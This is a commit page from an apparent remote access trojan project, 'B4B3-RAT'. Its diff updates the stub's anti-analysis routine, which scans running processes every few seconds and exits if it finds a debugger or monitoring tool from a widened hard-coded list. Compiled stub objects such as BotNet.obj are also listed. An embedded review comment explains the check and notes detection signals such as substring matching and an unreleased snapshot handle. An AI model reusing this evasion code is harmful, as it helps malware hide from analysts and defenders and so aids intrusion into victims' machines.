
Commit 2bd57a0

author
4b4db4b3
committed
Fix crash
1 parent 3280502 commit 2bd57a0

28 files changed

+46
-41
lines changed

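--- a/B4B3-RAT/Stub/Manager.cpp
+++ b/B4B3-RAT/Stub/Manager.cpp
@@ -124,15 +124,8 @@ std::vector<std::string> Manager::split(std::string str, char delim) {
 std::stringstream ss(str);
 std::string word;
 std::vector<std::string> splittened;
-while (std::getline(ss, word, delim))
-{
+while (std::getline(ss, word, delim)) {
 splittened.push_back(word);
 }
 return splittened;
-}
-
-std::string Manager::ToLower(std::string str) {
-std::string lower = "";
-std::transform(str.begin(), str.end(), lower.begin(), ::tolower);
-return lower;
 }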

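--- a/B4B3-RAT/Stub/Protector.cpp
+++ b/B4B3-RAT/Stub/Protector.cpp
@@ -24,17 +24,15 @@ SOFTWARE.
 
 #include "Protector.h"
 #include "Manager.h"
-#include <winternl.h>
 
 void Protector::AntiProcesses() {
 HANDLE hSnap;
 PROCESSENTRY32 pe32;
 pe32.dwSize = sizeof(PROCESSENTRY32);
 
-std::vector<std::string> processes =
-{
+std::vector<std::string> processes = {
 "ollydbg.exe",
-"ProcessHacker.exe",
+"processhacker.exe",
 "tcpview.exe",
 "autoruns.exe",
 "autorunsc.exe",
@@ -44,37 +42,45 @@ void Protector::AntiProcesses() {
 "procexp.exe",
 "idaq.exe",
 "idaq64.exe",
-"ImmunityDebugger.exe",
-"Wireshark.exe",
+"immunitydebugger.exe",
+"wireshark.exe",
 "dumpcap.exe",
-"HookExplorer.exe",
-"ImportREC.exe",
-"PETools.exe",
-"LordPE.exe",
-"SysInspector.exe",
+"hookexplorer.exe",
+"importrec.exe",
+"petools.exe",
+"lordpe.exe",
+"sysinspector.exe",
 "proc_analyzer.exe",
-"sysAnalyzer.exe",
+"sysanalyzer.exe",
 "sniff_hit.exe",
 "windbg.exe",
 "joeboxcontrol.exe",
-"joeboxserver.exe"
+"joeboxserver.exe",
+"windanr.exe",
+"q.exe",
+"dnspy.exe",
+"idapro.exe",
+"httpdebugger.exe"
 };
 
+size_t size = processes.size();
 std::string process = "";
 while (true) {
-Sleep(3000);
 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if (hSnap != NULL) {
 if (Process32First(hSnap, &pe32)) {
 do {
-process = Manager::ToLower(pe32.szExeFile);
-for (size_t i = 0; i < processes.size(); i++) {
+for (size_t i = 0; i < size; i++) {
+process = pe32.szExeFile;
+std::transform(process.begin(), process.end(), process.begin(),
+[](unsigned char c) { return std::tolower(c); });
 if (process.find(processes[i]) != std::string::npos) {
 ExitProcess(0);
 }
 }
 } while (Process32Next(hSnap, &pe32));
 }
 }
+Sleep(3000);
 }
 }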
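Review bot: `Protector::AntiProcesses` carries no comment saying what it is, and anyone reading this section should know it is an anti-analysis check: the loop snapshots the process list, lowercases each `pe32.szExeFile`, and calls `ExitProcess(0)` when that name contains any entry of the hard-coded list. A header comment such as `// Anti-analysis: exits when a running process name contains a listed debugger/monitor name (substring match, re-checked every 3 s)` would state that plainly. For analysts, the comparison is a substring `find`, so short entries like `"q.exe"` match far more than one tool, and the plain lowercase name strings are left unobfuscated in the stub. On the behavioural side, the fixed-interval `CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)` calls are a stable signal, and the snapshot handle is not released anywhere in the visible lines, so the process's handle count should climb steadily while it runs. Old lines 41–43 of the list fall between the two hunks and are not shown.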

B4B3-RAT/Stub/Release/BotNet.obj

56.1 KB
Binary file not shown.
58.2 KB
Binary file not shown.
58.1 KB
Binary file not shown.
56.3 KB
Binary file not shown.

B4B3-RAT/Stub/Release/Manager.obj

53.4 KB
Binary file not shown.

B4B3-RAT/Stub/Release/PrntSc.obj

58.1 KB
Binary file not shown.
56.2 KB
Binary file not shown.
65.5 KB
Binary file not shown.
